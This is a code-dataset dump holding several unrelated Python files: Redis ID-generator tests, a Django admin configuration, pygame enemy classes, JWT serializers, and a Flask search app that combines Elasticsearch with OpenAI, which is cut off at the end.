_NO_DEFAULT:\n return __anext__(iterator)\n\n async def anext_impl():\n try:\n return await __anext__(iterator)\n except StopAsyncIteration:\n return default\n return anext_impl()\n\n\n@pytest.fixture\ndef aioids(aioredis: AIORedis) -> AIONextID: # type: ignore\n return AIONextID(masters={aioredis})\n\n\nasync def test_aionextid(aioids: AIONextID) -> None:\n for expected in range(1, 10):\n got = await anext(aioids) # type: ignore\n assert got == expected, f'expected {expected}, got {got}'\n\n\nasync def test_reset(aioids: AIONextID) -> None:\n assert await anext(aioids) == 1 # type: ignore\n await aioids.reset()\n assert await anext(aioids) == 1 # type: ignore\n\n\n@pytest.mark.parametrize('num_aioids', range(1, 6))\nasync def test_contention(num_aioids: int) -> None:\n dbs = range(1, 6)\n urls = [f'redis://localhost:6379/{db}' for db in dbs]\n masters = [AIORedis.from_url(url, socket_timeout=1) for url in urls]\n aioids = [AIONextID(key='tweet-ids', masters=masters) for _ in range(num_aioids)]\n\n try:\n coros = [anext(aioids[id_gen]) for id_gen in range(num_aioids)] # type: ignore\n tasks = [asyncio.create_task(coro) for coro in coros]\n done, _ = await asyncio.wait(tasks)\n results = []\n with contextlib.suppress(QuorumNotAchieved):\n for task in done:\n results.append(task.result())\n assert len(results) == len(set(results))\n # To see the following output, issue:\n # $ source venv/bin/activate; pytest -rP tests/test_aionextid.py::test_contention; deactivate\n print(f'{num_aioids} aioids, {results} IDs')\n\n finally:\n # Clean up for the next unit test run.\n await aioids[0].reset()\n\n\ndef test_slots(aioids: AIONextID) -> None:\n with pytest.raises(AttributeError):\n aioids.__dict__\n\n\ndef test_aiter(aioids: AIONextID) -> None:\n assert aiter(aioids) is aioids # type: ignore\n\n\nasync def test_anext_quorumnotachieved(aioids: AIONextID) -> None:\n aioredis = next(iter(aioids.masters))\n with pytest.raises(QuorumNotAchieved), \\\n 
unittest.mock.patch.object(aioredis, 'get') as get:\n get.side_effect = TimeoutError\n await anext(aioids) # type: ignore\n\n with pytest.raises(QuorumNotAchieved), \\\n unittest.mock.patch.object(AsyncScript, '__call__') as __call__:\n __call__.side_effect = TimeoutError\n await anext(aioids) # type: ignore\n\n\nasync def test_reset_quorumnotachieved(aioids: AIONextID) -> None:\n aioredis = next(iter(aioids.masters))\n with pytest.raises(QuorumNotAchieved), \\\n unittest.mock.patch.object(aioredis, 'delete') as delete:\n delete.side_effect = TimeoutError\n await aioids.reset()\n\n\ndef test_repr(aioids: AIONextID) -> None:\n assert repr(aioids) == ''\n", "repo_name": "brainix/pottery", "sub_path": "tests/test_aionextid.py", "file_name": "test_aionextid.py", "file_ext": "py", "file_size_in_byte": 4066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 930, "dataset": "github-code", "pt": "61", "api": [{"api_name": "redis.asyncio.Redis", "line_number": 51, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 52, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pottery.AIONextID", "line_number": 51, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 55, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 61, "usage_type": "name"}, {"api_name": "redis.asyncio.Redis.from_url", "line_number": 71, "usage_type": "call"}, {"api_name": "redis.asyncio.Redis", "line_number": 71, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 72, "usage_type": "call"}, {"api_name": "asyncio.create_task", "line_number": 76, "usage_type": "call"}, {"api_name": "asyncio.wait", "line_number": 77, "usage_type": "call"}, {"api_name": "contextlib.suppress", "line_number": 79, "usage_type": "call"}, {"api_name": "pottery.QuorumNotAchieved", "line_number": 79, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 67, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pottery.AIONextID", "line_number": 92, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 93, "usage_type": "call"}, {"api_name": "pottery.AIONextID", "line_number": 97, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 101, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 103, "usage_type": "call"}, {"api_name": "pottery.QuorumNotAchieved", "line_number": 103, "usage_type": "argument"}, {"api_name": "unittest.mock.mock.patch.object", "line_number": 104, "usage_type": "call"}, {"api_name": "unittest.mock.mock", "line_number": 104, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 104, "usage_type": "name"}, {"api_name": "redis.exceptions.TimeoutError", "line_number": 105, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 108, "usage_type": "call"}, {"api_name": "pottery.QuorumNotAchieved", "line_number": 108, "usage_type": "argument"}, {"api_name": "unittest.mock.mock.patch.object", "line_number": 109, "usage_type": "call"}, {"api_name": "redis.commands.core.AsyncScript", "line_number": 109, "usage_type": "argument"}, {"api_name": "unittest.mock.mock", "line_number": 109, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 109, "usage_type": "name"}, {"api_name": "redis.exceptions.TimeoutError", "line_number": 110, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 114, 
"usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 116, "usage_type": "call"}, {"api_name": "pottery.QuorumNotAchieved", "line_number": 116, "usage_type": "argument"}, {"api_name": "unittest.mock.mock.patch.object", "line_number": 117, "usage_type": "call"}, {"api_name": "unittest.mock.mock", "line_number": 117, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 117, "usage_type": "name"}, {"api_name": "redis.exceptions.TimeoutError", "line_number": 118, "usage_type": "name"}, {"api_name": "pottery.AIONextID", "line_number": 122, "usage_type": "name"}]} +{"seq_id": "14261098528", "text": "from django.contrib import admin\nfrom users.models import Follow, User\n\n\nclass UserAdmin(admin.ModelAdmin):\n list_display = (\n 'username',\n 'first_name',\n 'last_name',\n 'email'\n )\n search_fields = ('username', 'email')\n filter_horizontal = ('favorite_recipes',)\n list_filter = ('email', 'username')\n empty_value_display = '-пусто-'\n\n\nclass FollowAdmin(admin.ModelAdmin):\n list_display = (\n 'user',\n 'author'\n )\n search_fields = (\n 'user__username',\n 'user__email',\n 'user__first_name',\n 'author__username',\n 'author__email',\n 'author__first_name'\n )\n list_filter = ('author', 'user')\n\n\nadmin.site.register(User, UserAdmin)\nadmin.site.register(Follow, FollowAdmin)\n", "repo_name": "Gena40/foodgram-project-react", "sub_path": "backend/food_assistance/users/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 34, "usage_type": "call"}, {"api_name": "users.models.User", "line_number": 34, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 34, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 35, "usage_type": "call"}, {"api_name": "users.models.Follow", "line_number": 35, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "11950358866", "text": "import pygame as pg\r\nimport Game\r\nimport My as my\r\nfrom Help import cut, crEvil, crFirework\r\nfrom Objects import Water\r\nfrom Bullets import FireBall\r\n\r\n\r\n\"\"\"Монстры\"\"\"\r\n\r\n\r\nclass Evil(pg.sprite.Sprite):\r\n\r\n volumeRun = Game.SOUND_VOLUME / 5\r\n maxWait = Game.TIME * 10\r\n \r\n def __init__(self, x, y):\r\n super().__init__(my.evil_group, my.all_sprites)\r\n self.direction = 'R'\r\n self.health = self.maxHealth\r\n self.wait = Evil.maxWait\r\n self.step = 0\r\n self.time = 0\r\n self.image = self.imageDied[self.direction]\r\n self.rect = self.image.get_rect().move(x * Game.CELL_SIZE,\r\n y * Game.CELL_SIZE)\r\n self.firework = None\r\n self.died = False\r\n \r\n def moving(self):\r\n # Перемещение\r\n x, y = Game.H_POS\r\n if y > self.rect.y:\r\n self.direction = 'D'\r\n self.rect.y += self.speed\r\n if y < 
self.rect.y:\r\n            self.direction = 'U'\r\n            self.rect.y -= self.speed\r\n        if x > self.rect.x:\r\n            self.direction = 'R'\r\n            self.rect.x += self.speed\r\n        if x < self.rect.x:\r\n            self.direction = 'L'\r\n            self.rect.x -= self.speed\r\n\r\n    def to_hurt(self, damage):\r\n        # Taking damage\r\n        print(f\"{type(self).__name__}: -{damage} hp\")\r\n        if my.sound:\r\n            self.soundDamage.play()\r\n        self.health -= damage\r\n        if self.health <= 0:\r\n            self.death()\r\n\r\n    def setImage(self, style):\r\n        # Change animation frame\r\n        if style == 'moving' or self.wait:\r\n            if self.time == Game.TIME:\r\n                if my.sound_run:\r\n                    self.soundRun.play() \r\n                self.image = self.imageRun[self.direction][self.step]\r\n                self.step = (\r\n                    self.step + 1) % len(self.imageRun[self.direction])\r\n                self.time = 0\r\n            else:\r\n                self.time += 1\r\n        elif style == 'fight':\r\n            self.image = self.imageAttack[self.direction]\r\n            self.time = 0\r\n\r\n    def do(self):\r\n        pass\r\n\r\n\r\nclass Pig(Evil):\r\n    \r\n    \"\"\"\r\n    Pig:\r\n    - Gores the hero with its horn\r\n    - Destroys everything in its path\r\n    \"\"\"\r\n    \r\n    imageRun = {'R': cut(pg.image.load('data/pig/rightRun.png')),\r\n                'L': cut(pg.image.load('data/pig/leftRun.png')),\r\n                'U': cut(pg.image.load('data/pig/leftRun.png')),\r\n                'D': cut(pg.image.load('data/pig/leftRun.png')),\r\n                }\r\n\r\n    imageAttack = {'R': pg.image.load('data/pig/rightAttack.png'),\r\n                   'L': pg.image.load('data/pig/leftAttack.png'),\r\n                   'U': pg.image.load('data/pig/leftAttack.png'),\r\n                   'D': pg.image.load('data/pig/leftAttack.png'),\r\n                   }\r\n\r\n    imageDied = {'R': pg.image.load('data/pig/rightDied.png'),\r\n                 'L': pg.image.load('data/pig/leftDied.png'),\r\n                 'U': pg.image.load('data/pig/leftDied.png'),\r\n                 'D': pg.image.load('data/pig/leftDied.png'),\r\n                 }\r\n\r\n    soundRun = pg.mixer.Sound('data/sounds/pig/run.mp3')\r\n    soundRun.set_volume(Evil.volumeRun)\r\n    soundFight = pg.mixer.Sound('data/sounds/pig/fight.mp3')\r\n    soundFight.set_volume(Game.SOUND_VOLUME)\r\n    soundDamage = pg.mixer.Sound('data/sounds/pig/damage.mp3')\r\n    soundDamage.set_volume(Game.SOUND_VOLUME)\r\n    \r\n    speed = 0.1 * Game.CELL_SIZE\r\n    disRun = 10 * Game.CELL_SIZE\r\n    disAttack = 3 * Game.CELL_SIZE\r\n    disFight = Game.CELL_SIZE\r\n    maxHealth = 5\r\n    power = 2\r\n\r\n    def move(self):\r\n        # Action\r\n        if not self.wait:\r\n            self.setImage('moving')\r\n            self.backMoving()\r\n        elif self.check(Pig.disFight):\r\n            self.setImage('fight')\r\n            self.fight()\r\n        elif self.check(Pig.disAttack):\r\n            self.setImage('fight')\r\n            if my.sound:\r\n                self.soundFight.play()\r\n            self.attack()\r\n        elif self.check(Pig.disRun):\r\n            self.setImage('moving')\r\n            self.moving()\r\n        obj = pg.sprite.spritecollideany(self, my.objects)\r\n        if obj:\r\n            if obj.__class__ != Water:\r\n                print(f\"Pig: broke {type(obj).__name__}\")\r\n                obj.death()\r\n            else:\r\n                print(f\"Pig: died\")\r\n                self.death()\r\n\r\n    def check(self, dis):\r\n        # Check the distance to the hero\r\n        return (dis >= abs(self.rect.x - Game.H_POS[0]) and\r\n                dis >= abs(self.rect.y - Game.H_POS[1]))\r\n\r\n    def attack(self):\r\n        # Attack\r\n        x, y = Game.H_POS\r\n        if (abs(self.rect.x - x) < Game.CELL_SIZE and\r\n                abs(self.rect.y - y) < Game.CELL_SIZE):\r\n            return\r\n\r\n        if y > self.rect.y:\r\n            self.rect.y += self.speed * 4\r\n        if y <= self.rect.y:\r\n            self.rect.y -= self.speed * 4\r\n        if x > self.rect.x:\r\n            self.rect.x += self.speed * 4\r\n        if x <= self.rect.x:\r\n            self.rect.x -= self.speed * 4\r\n\r\n    def fight(self):\r\n        # Strike\r\n        my.player.removeLifes(Pig.power)\r\n        self.wait = 0\r\n\r\n    def backMoving(self):\r\n        # Return to the starting position\r\n        if self.direction == 'U':\r\n            self.rect.y += self.speed * 4\r\n        if self.direction == 'D':\r\n            self.rect.y -= self.speed * 4\r\n        if self.direction == 'L':\r\n            self.rect.x += self.speed * 4\r\n        if self.direction == 'R':\r\n            self.rect.x -= self.speed * 4\r\n        if not self.check(self.disAttack * 3):\r\n            self.wait = Evil.maxWait\r\n\r\n    def death(self):\r\n        # Death\r\n        print(f\"Pig: died\")\r\n        my.score += 1000\r\n        my.evil_group.remove(self)\r\n        my.objects.add(self)\r\n        self.image = self.imageDied[self.direction]\r\n        crEvil()\r\n    \r\n\r\nclass Ghost(Evil):\r\n\r\n    \"\"\"\r\n    Ghost:\r\n    - Launches a fireball at the hero\r\n    - Passes through any obstacles\r\n    - The last ghost to have wounded the hero dies during prayer\r\n    \"\"\"\r\n\r\n    imageRun = {'R': cut(pg.image.load('data/ghost/right.png')),\r\n                'L': cut(pg.image.load('data/ghost/left.png')),\r\n                'U': cut(pg.image.load('data/ghost/left.png')),\r\n                'D': cut(pg.image.load('data/ghost/left.png')),\r\n                }\r\n\r\n    imageAttack = {'R': pg.image.load('data/ghost/rightAttack.png'),\r\n                   'L': pg.image.load('data/ghost/leftAttack.png'),\r\n                   'U': pg.image.load('data/ghost/leftAttack.png'),\r\n                   'D': pg.image.load('data/ghost/leftAttack.png'),\r\n                   }\r\n\r\n    imageDied = {'R': pg.image.load('data/ghost/rightDied.png'),\r\n                 'L': pg.image.load('data/ghost/leftDied.png'),\r\n                 'U': pg.image.load('data/ghost/leftDied.png'),\r\n                 'D': pg.image.load('data/ghost/leftDied.png'),\r\n                 }\r\n\r\n    soundRun = pg.mixer.Sound('data/sounds/ghost/run.mp3')\r\n    soundRun.set_volume(Evil.volumeRun)\r\n    soundFight = pg.mixer.Sound('data/sounds/ghost/fight.mp3')\r\n    soundFight.set_volume(Game.SOUND_VOLUME)\r\n    soundDamage = pg.mixer.Sound('data/sounds/ghost/damage.mp3')\r\n    soundDamage.set_volume(Game.SOUND_VOLUME)\r\n\r\n    speed = 0.05 * Game.CELL_SIZE\r\n    disRun = 10 * Game.CELL_SIZE\r\n    disFight = 6 * Game.CELL_SIZE\r\n    maxHealth = 10\r\n\r\n    def move(self):\r\n        # Action\r\n        if self.died:\r\n            if self.firework:\r\n                for fire in self.firework:\r\n                    fire.update(self.firework)\r\n            else:\r\n                my.evil_group.remove(self) \r\n        elif self.check(Ghost.disFight, 0):\r\n            self.setImage('fight')\r\n            self.fight()\r\n        elif self.check(Ghost.disRun, Ghost.disRun):\r\n            self.wait = Evil.maxWait\r\n            self.setImage('moving')\r\n            self.moving()\r\n\r\n    def check(self, dis1, dis2):\r\n        # Check the distance to the hero\r\n        x, y = abs(self.rect.x - Game.H_POS[0]), abs(self.rect.y - Game.H_POS[1])\r\n        return (dis1 >= x and dis2 >= y or dis1 >= y and dis2 >= x)\r\n\r\n    def fight(self):\r\n        # Launch a fireball\r\n        if self.wait == Evil.maxWait:\r\n            print(f\"Ghost: created FireBall\")\r\n            if Game.H_POS[1] > self.rect.y:\r\n                direction = 'D'\r\n            elif Game.H_POS[1] < self.rect.y:\r\n                direction = 'U'\r\n            elif Game.H_POS[0] > self.rect.x:\r\n                direction = 'R'\r\n            elif Game.H_POS[0] < self.rect.x:\r\n                direction = 'L'\r\n            else:\r\n                direction = 'A'\r\n            FireBall(self, direction)\r\n            self.wait = 0\r\n        else:\r\n            self.wait += 1\r\n\r\n    def death(self):\r\n        # Death\r\n        print(f\"Ghost: died\")\r\n        my.score += 1500\r\n        if self.died:\r\n            return\r\n        self.image = self.imageDied[self.direction]\r\n        pos = (self.rect.x + Game.CELL_SIZE / 2,\r\n               self.rect.y + Game.CELL_SIZE / 2)\r\n        self.firework = crFirework(pos)\r\n        self.died = True\r\n        crEvil()\r\n    \r\n    \r\n    \r\n\r\n\r\n\r\n\r\n    \r\n", "repo_name": "MaxGolubev19/Game-about-Ilusha", "sub_path": "Evil.py", "file_name": "Evil.py", "file_ext": "py", "file_size_in_byte": 9587, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 
"github-code", "pt": "61", "api": [{"api_name": "pygame.sprite", "line_number": 12, "usage_type": "attribute"}, {"api_name": "Game.SOUND_VOLUME", "line_number": 14, "usage_type": "attribute"}, {"api_name": "Game.TIME", "line_number": 15, "usage_type": "attribute"}, {"api_name": "My.evil_group", "line_number": 18, "usage_type": "attribute"}, {"api_name": "My.all_sprites", "line_number": 18, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 25, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 32, "usage_type": "attribute"}, {"api_name": "My.sound", "line_number": 49, "usage_type": "attribute"}, {"api_name": "Game.TIME", "line_number": 58, "usage_type": "attribute"}, {"api_name": "My.sound_run", "line_number": 59, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 83, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 84, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 85, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 90, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 91, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 92, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 97, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 97, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 98, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 98, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 101, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 103, "usage_type": "attribute"}, {"api_name": "Game.SOUND_VOLUME", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 105, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 105, "usage_type": "attribute"}, {"api_name": "Game.SOUND_VOLUME", 
"line_number": 106, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 108, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 109, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 110, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 111, "usage_type": "attribute"}, {"api_name": "My.sound", "line_number": 125, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 131, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 131, "usage_type": "attribute"}, {"api_name": "My.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "Objects.Water", "line_number": 133, "usage_type": "name"}, {"api_name": "Game.H_POS", "line_number": 142, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 143, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 147, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 148, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 149, "usage_type": "attribute"}, {"api_name": "My.player.removeLifes", "line_number": 163, "usage_type": "call"}, {"api_name": "My.player", "line_number": 163, "usage_type": "attribute"}, {"api_name": "My.score", "line_number": 182, "usage_type": "attribute"}, {"api_name": "My.evil_group.remove", "line_number": 183, "usage_type": "call"}, {"api_name": "My.evil_group", "line_number": 183, "usage_type": "attribute"}, {"api_name": "My.objects.add", "line_number": 184, "usage_type": "call"}, {"api_name": "My.objects", "line_number": 184, "usage_type": "attribute"}, {"api_name": "Help.crEvil", "line_number": 186, "usage_type": "call"}, {"api_name": "Help.cut", "line_number": 198, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 198, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 198, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 199, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 199, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 199, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 200, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 200, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 200, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 201, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 201, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 201, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 204, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 204, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 205, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 206, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 206, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 207, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 207, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 210, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 210, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 211, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 211, "usage_type": "attribute"}, 
{"api_name": "pygame.image.load", "line_number": 212, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 212, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 213, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 213, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 216, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 216, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 218, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 218, "usage_type": "attribute"}, {"api_name": "Game.SOUND_VOLUME", "line_number": 219, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 220, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 220, "usage_type": "attribute"}, {"api_name": "Game.SOUND_VOLUME", "line_number": 221, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 223, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 224, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 225, "usage_type": "attribute"}, {"api_name": "My.evil_group.remove", "line_number": 235, "usage_type": "call"}, {"api_name": "My.evil_group", "line_number": 235, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 246, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 253, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 255, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 257, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 259, "usage_type": "attribute"}, {"api_name": "Bullets.FireBall", "line_number": 263, "usage_type": "call"}, {"api_name": "My.score", "line_number": 271, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 275, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 276, "usage_type": "attribute"}, {"api_name": "Help.crFirework", "line_number": 277, "usage_type": "call"}, {"api_name": "Help.crEvil", "line_number": 279, "usage_type": "call"}]} +{"seq_id": "14694325717", "text": "from rest_framework import serializers\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom six import text_type\n\n\nclass APILoginSerializer(TokenObtainPairSerializer):\n\n def validate(self, attrs):\n data = super(TokenObtainPairSerializer, self).validate(attrs)\n\n refresh = self.get_token(self.user)\n\n data['access_token'] = text_type(refresh.access_token)\n data['refresh_token'] = text_type(refresh)\n\n return data\n\n\nclass APIRefreshSerializer(serializers.Serializer):\n\n refresh_token = serializers.CharField(required=True)\n\n def validate(self, attrs):\n\n refresh = RefreshToken(attrs['refresh_token'])\n\n data = {'access_token': text_type(refresh.access_token)}\n\n return data\n", "repo_name": "pythrick/django-template", "sub_path": "app/serializers/authentication.py", "file_name": "authentication.py", "file_ext": "py", "file_size_in_byte": 822, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework_simplejwt.serializers.TokenObtainPairSerializer", "line_number": 7, "usage_type": "name"}, {"api_name": "rest_framework_simplejwt.serializers.TokenObtainPairSerializer", "line_number": 10, "usage_type": "argument"}, {"api_name": "six.text_type", 
"line_number": 14, "usage_type": "call"}, {"api_name": "six.text_type", "line_number": 15, "usage_type": "call"}, {"api_name": "rest_framework.serializers.Serializer", "line_number": 20, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 20, "usage_type": "name"}, {"api_name": "rest_framework.serializers.CharField", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 22, "usage_type": "name"}, {"api_name": "rest_framework_simplejwt.tokens.RefreshToken", "line_number": 26, "usage_type": "call"}, {"api_name": "six.text_type", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "21321215970", "text": "from flask import Flask, render_template, request\nfrom elasticsearch import Elasticsearch\nimport openai\nimport os\nimport queries\n\nELASTIC_CLOUD_ID = os.getenv('ELASTIC_CLOUD_ID')\nELASTIC_USERNAME = os.getenv('ELASTIC_USERNAME')\nELASTIC_PASSWORD = os.getenv('ELASTIC_PASSWORD')\n\nOPENAI_API_KEY = os.getenv('OPENAI_API_KEY')\nES_INDEX = 'my-index'\n\napp = Flask(__name__, template_folder='templates', static_folder='static')\n\n# Configure Elasticsearch\nes = Elasticsearch(cloud_id=ELASTIC_CLOUD_ID, basic_auth=(ELASTIC_USERNAME, ELASTIC_PASSWORD))\n\n# Configure OpenAI\nopenai.api_key = OPENAI_API_KEY\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/search', methods=['POST'])\ndef search():\n # Retrieve the user input from the form\n\n elser = request.form.get('elser')\n bm25 = request.form.get('BM25')\n hybrid = request.form.get('hybrid')\n rrf = request.form.get('rrf')\n\n query = request.form['query']\n elser_boost = 0 if request.form['elser_boost'] == '' else int(request.form['elser_boost'])\n bm25_boost = 0 if request.form['BM25_boost'] == '' else int(request.form['BM25_boost'])\n\n if elser_boost or bm25_boost or hybrid:\n # Hybrid search\n if elser_boost == 0:\n elser_boost = 1\n if bm25_boost == 0:\n bm25_boost = 1\n results_hybrid = queries.hybrid_search(query, elser_boost, bm25_boost, es, ES_INDEX)\n paragraphs_hybrid = [hit['_source']['text'] for hit in results_hybrid['hits']['hits']]\n response_hybrid = queries.generate_text(paragraphs_hybrid, query, openai)\n else:\n results_hybrid = None\n response_hybrid = None\n\n if bm25:\n results_bm25 = queries.search_documents(query, es, ES_INDEX)\n paragraphs = [hit['_source']['text'] for hit in results_bm25['hits']['hits']]\n response_bm25 = queries.generate_text(paragraphs, query, openai)\n else:\n results_bm25 = None\n response_bm25 = None\n\n if elser:\n results_elser = queries.e_search_documents(query, es, ES_INDEX)\n paragraphs_e = [hit['_source']['text'] for hit in results_elser['hits']['hits']]\n response_elser = queries.generate_text(paragraphs_e, query, openai)\n else:\n results_elser = None\n response_elser = None\n\n if rrf:\n results_rff = queries.rrf(query, ES_INDEX)\n paragraphs_rff = [hit['_source']['text'] for hit in results_rff['hits']['hits']]\n response_rff = queries.generate_text(paragraphs_rff, query, openai)\n else:\n results_rff = None\n response_rff = None\n\n return render_template('search.html', query=query, results_hybrid=results_hybrid, response_hybrid=response_hybrid,\n results_bm25=results_bm25,\n response_bm25=response_bm25, results_elser=results_elser, response_elser=response_elser,\n results_rff=results_rff, response_rff=response_rff)\n\n\nif __name__ == '__main__':\n 